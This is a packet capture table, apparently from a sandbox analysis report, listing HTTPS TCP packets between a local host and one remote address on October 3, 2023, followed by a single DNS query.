Oct 3, 2023 22:37:58.591028929 CEST	443	49897	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:58.591078043 CEST	49898	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:58.591152906 CEST	443	49898	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:58.591178894 CEST	49898	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:58.591202021 CEST	443	49898	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:58.591308117 CEST	49897	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:58.591355085 CEST	443	49897	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:58.591383934 CEST	49898	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:58.591396093 CEST	443	49898	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:58.591447115 CEST	49898	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:58.591464996 CEST	443	49898	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:58.591511965 CEST	49898	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:58.591530085 CEST	443	49898	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:58.592652082 CEST	443	49896	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:58.592853069 CEST	49896	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:58.592869997 CEST	443	49896	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:59.026863098 CEST	443	49896	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:59.026974916 CEST	443	49896	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:59.027023077 CEST	49896	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:59.027317047 CEST	49896	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:59.030041933 CEST	443	49897	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:59.030137062 CEST	443	49897	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:59.030251026 CEST	49897	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:59.030415058 CEST	49897	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:59.031137943 CEST	49898	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:59.031471014 CEST	443	49898	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:59.031546116 CEST	49898	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:10.012469053 CEST	49899	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:10.012510061 CEST	443	49899	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:10.012551069 CEST	49900	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:10.012578011 CEST	49899	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:10.012584925 CEST	443	49900	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:10.012588024 CEST	49901	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:10.012609005 CEST	443	49901	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:10.012641907 CEST	49900	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:10.012675047 CEST	49901	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:10.013226032 CEST	49899	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:10.013240099 CEST	443	49899	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:10.013325930 CEST	49901	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:10.013340950 CEST	443	49901	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:10.013397932 CEST	49900	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:10.013411045 CEST	443	49900	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:10.260242939 CEST	443	49899	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:10.260361910 CEST	443	49901	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:10.260478020 CEST	49899	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:10.260499001 CEST	49901	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:10.261817932 CEST	49899	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:10.261826038 CEST	443	49899	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:10.261857986 CEST	49901	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:10.261878014 CEST	443	49901	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:10.262063980 CEST	443	49899	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:10.262120962 CEST	443	49901	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:10.262262106 CEST	443	49900	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:10.262337923 CEST	49900	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:10.264337063 CEST	49901	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:10.264451981 CEST	49899	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:10.265333891 CEST	49900	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:10.265343904 CEST	443	49900	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:10.265719891 CEST	443	49900	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:10.267544985 CEST	49900	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:10.306452990 CEST	443	49899	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:10.306463003 CEST	443	49901	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:10.310445070 CEST	443	49900	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:10.465245962 CEST	443	49899	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:10.465564966 CEST	49899	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:10.465626955 CEST	443	49899	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:10.474812984 CEST	443	49901	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:10.478897095 CEST	49901	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:10.478929996 CEST	443	49901	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:10.481671095 CEST	49901	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:10.481692076 CEST	443	49901	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:10.481875896 CEST	49901	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:10.481894970 CEST	443	49901	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:10.482017994 CEST	49901	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:10.482029915 CEST	443	49901	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:10.491039038 CEST	443	49900	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:10.494813919 CEST	49900	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:10.494834900 CEST	443	49900	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:10.892443895 CEST	443	49899	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:10.892544031 CEST	443	49899	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:10.892637014 CEST	49899	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:10.892934084 CEST	49899	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:10.936911106 CEST	443	49900	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:10.937072992 CEST	443	49900	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:10.937275887 CEST	49900	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:10.937356949 CEST	49900	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:11.316848993 CEST	443	49901	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:11.316943884 CEST	443	49901	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:11.317064047 CEST	49901	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:11.320492029 CEST	49901	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:38.663769960 CEST	49903	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:38.663858891 CEST	443	49903	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:38.663945913 CEST	49903	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:38.664309025 CEST	49903	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:38.664349079 CEST	443	49903	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:38.779828072 CEST	49904	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:38.779916048 CEST	443	49904	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:38.780000925 CEST	49904	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:38.780410051 CEST	49904	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:38.780433893 CEST	443	49904	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:38.870683908 CEST	443	49903	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:38.872179031 CEST	49903	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:38.872257948 CEST	443	49903	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:38.996232033 CEST	443	49904	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:38.998223066 CEST	49904	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:38.998270035 CEST	443	49904	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:39.114912987 CEST	443	49903	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:39.115176916 CEST	49903	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:39.115235090 CEST	443	49903	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:39.275624990 CEST	443	49904	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:39.275886059 CEST	49904	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:39.275907040 CEST	443	49904	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:39.557502031 CEST	443	49903	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:39.557692051 CEST	443	49903	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:39.557774067 CEST	49903	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:39.557977915 CEST	49903	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:39.719682932 CEST	443	49904	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:39.719867945 CEST	443	49904	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:39.719955921 CEST	49904	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:39.720761061 CEST	49904	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:39.845973969 CEST	49905	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:39.846003056 CEST	443	49905	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:39.846126080 CEST	49905	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:39.846457958 CEST	49905	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:39.846465111 CEST	443	49905	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:40.055102110 CEST	443	49905	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:40.056571960 CEST	49905	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:40.056588888 CEST	443	49905	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:40.283955097 CEST	443	49905	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:40.287151098 CEST	49905	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:40.287189007 CEST	443	49905	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:40.289143085 CEST	49905	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:40.289165020 CEST	443	49905	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:40.292707920 CEST	49905	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:40.292732000 CEST	443	49905	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:40.298645973 CEST	49905	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:40.298665047 CEST	443	49905	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:41.559365034 CEST	443	49905	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:41.559459925 CEST	443	49905	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:41.559632063 CEST	49905	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:41.559880972 CEST	49905	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:51.501486063 CEST	49906	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:51.501523972 CEST	443	49906	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:51.501611948 CEST	49906	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:51.502244949 CEST	49906	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:51.502258062 CEST	443	49906	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:51.503717899 CEST	49907	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:51.503779888 CEST	443	49907	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:51.503838062 CEST	49907	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:51.504134893 CEST	49907	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:51.504153013 CEST	443	49907	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:51.506571054 CEST	49908	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:51.506609917 CEST	443	49908	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:51.506671906 CEST	49908	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:51.507011890 CEST	49908	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:51.507029057 CEST	443	49908	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:51.716444016 CEST	443	49906	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:51.717875004 CEST	443	49907	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:51.717914104 CEST	49906	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:51.717931032 CEST	443	49906	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:51.718904972 CEST	49907	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:51.718959093 CEST	443	49907	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:51.742314100 CEST	443	49908	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:51.743494987 CEST	49908	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:51.743513107 CEST	443	49908	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:51.945055008 CEST	443	49906	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:51.945314884 CEST	49906	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:51.945354939 CEST	443	49906	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:51.950423956 CEST	443	49907	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:51.951473951 CEST	49907	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:51.951510906 CEST	443	49907	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:51.972067118 CEST	443	49908	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:51.972444057 CEST	49908	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:51.972486019 CEST	443	49908	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:51.972630978 CEST	49908	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:51.972649097 CEST	443	49908	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:51.972666979 CEST	49908	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:51.972673893 CEST	443	49908	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:51.972733021 CEST	49908	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:51.972748995 CEST	443	49908	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:51.972832918 CEST	49908	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:51.972909927 CEST	49908	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:51.972963095 CEST	443	49908	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:51.972986937 CEST	49908	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:51.973037004 CEST	49908	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:51.973103046 CEST	443	49908	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:51.973104000 CEST	49908	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:51.973131895 CEST	443	49908	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:51.973150969 CEST	49908	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:51.973225117 CEST	443	49908	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:51.973258972 CEST	443	49908	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:52.378937006 CEST	443	49906	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:52.379010916 CEST	443	49906	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:52.379143000 CEST	49906	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:52.379520893 CEST	49906	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:52.380217075 CEST	49907	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:52.380249023 CEST	49908	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:52.380423069 CEST	443	49908	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:52.380578995 CEST	443	49907	172.67.150.79	192.168.2.4
Oct 3, 2023 22:38:52.380664110 CEST	49908	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:38:52.380676031 CEST	49907	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:00.353912115 CEST	49909	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:00.353914976 CEST	49910	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:00.353995085 CEST	443	49909	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:00.353998899 CEST	443	49910	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:00.354095936 CEST	49909	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:00.354168892 CEST	49910	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:00.354295015 CEST	49909	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:00.354320049 CEST	443	49909	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:00.354372978 CEST	49910	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:00.354398966 CEST	443	49910	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:00.502842903 CEST	49911	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:00.502887964 CEST	443	49911	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:00.502948046 CEST	49911	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:00.503139973 CEST	49911	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:00.503151894 CEST	443	49911	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:00.572208881 CEST	443	49909	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:00.572297096 CEST	49909	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:00.573491096 CEST	49909	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:00.573529005 CEST	443	49909	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:00.573852062 CEST	443	49909	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:00.575385094 CEST	49909	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:00.578828096 CEST	443	49910	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:00.578907967 CEST	49910	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:00.579921007 CEST	49910	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:00.579929113 CEST	443	49910	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:00.580316067 CEST	443	49910	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:00.581218004 CEST	49910	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:00.618486881 CEST	443	49909	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:00.622483969 CEST	443	49910	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:00.709805965 CEST	443	49911	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:00.709886074 CEST	49911	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:00.711057901 CEST	49911	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:00.711071014 CEST	443	49911	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:00.711740017 CEST	443	49911	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:00.713745117 CEST	49911	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:00.754488945 CEST	443	49911	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:00.801392078 CEST	443	49909	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:00.802706957 CEST	49909	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:00.802767038 CEST	443	49909	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:00.807543039 CEST	443	49910	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:00.808274031 CEST	49910	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:00.808315039 CEST	443	49910	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:00.937160969 CEST	443	49911	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:00.937524080 CEST	49911	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:00.937577963 CEST	443	49911	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:00.937756062 CEST	49911	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:00.937778950 CEST	443	49911	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:00.937886000 CEST	49911	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:00.937984943 CEST	443	49911	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:00.938097000 CEST	49911	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:00.938194036 CEST	443	49911	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:00.938529015 CEST	443	49911	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:00.939424038 CEST	443	49911	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:01.030972004 CEST	49912	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:01.031054974 CEST	443	49912	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:01.031112909 CEST	49913	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:01.031202078 CEST	443	49913	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:01.031286955 CEST	49912	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:01.031522989 CEST	49912	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:01.031524897 CEST	49913	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:01.031543970 CEST	443	49912	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:01.031601906 CEST	49913	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:01.031620979 CEST	443	49913	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:01.241832018 CEST	443	49909	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:01.241895914 CEST	443	49909	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:01.242083073 CEST	49909	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:01.242185116 CEST	49909	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:01.269840002 CEST	443	49913	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:01.270838976 CEST	443	49912	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:01.271027088 CEST	49913	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:01.271078110 CEST	443	49913	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:01.271959066 CEST	49912	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:01.271996021 CEST	443	49912	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:01.326461077 CEST	443	49910	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:01.326620102 CEST	443	49910	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:01.326813936 CEST	49910	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:01.326878071 CEST	443	49910	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:01.326906919 CEST	49910	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:01.326942921 CEST	49910	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:01.498068094 CEST	443	49913	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:01.498239994 CEST	49913	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:01.498281002 CEST	443	49913	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:01.500386953 CEST	443	49912	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:01.500515938 CEST	49912	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:01.500545979 CEST	443	49912	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:01.769906998 CEST	443	49911	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:01.770080090 CEST	443	49911	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:01.770195007 CEST	49911	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:01.770276070 CEST	49911	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:01.927504063 CEST	443	49913	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:01.927678108 CEST	443	49913	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:01.927813053 CEST	49913	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:01.927891016 CEST	49913	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:01.941801071 CEST	443	49912	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:01.942240000 CEST	49912	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:01.942349911 CEST	443	49912	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:01.942423105 CEST	49912	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:01.942452908 CEST	49914	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:01.942480087 CEST	443	49914	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:01.942791939 CEST	49914	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:01.942791939 CEST	49914	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:01.942823887 CEST	443	49914	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:02.142781973 CEST	443	49914	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:02.142882109 CEST	49914	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:02.143954992 CEST	49914	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:02.143959999 CEST	443	49914	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:02.144190073 CEST	443	49914	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:02.146454096 CEST	49914	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:02.190474987 CEST	443	49914	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:02.371515036 CEST	443	49914	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:02.371819973 CEST	49914	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:02.371833086 CEST	443	49914	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:02.372081995 CEST	49914	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:02.372081995 CEST	49914	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:02.372090101 CEST	443	49914	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:02.372097015 CEST	443	49914	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:02.372193098 CEST	49914	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:02.372199059 CEST	443	49914	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:02.372322083 CEST	49914	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:02.372328043 CEST	443	49914	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:02.372443914 CEST	49914	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:02.372450113 CEST	443	49914	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:02.372562885 CEST	49914	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:02.372570992 CEST	443	49914	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:02.372673988 CEST	49914	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:39:02.372679949 CEST	443	49914	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:03.199554920 CEST	443	49914	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:03.199644089 CEST	443	49914	172.67.150.79	192.168.2.4
Oct 3, 2023 22:39:03.199774027 CEST	49914	443	192.168.2.4	172.67.150.79

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2023 22:34:57.618849039 CEST	64097	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:34:57.719342947 CEST	53	64097	8.8.8.8	192.168.2.4
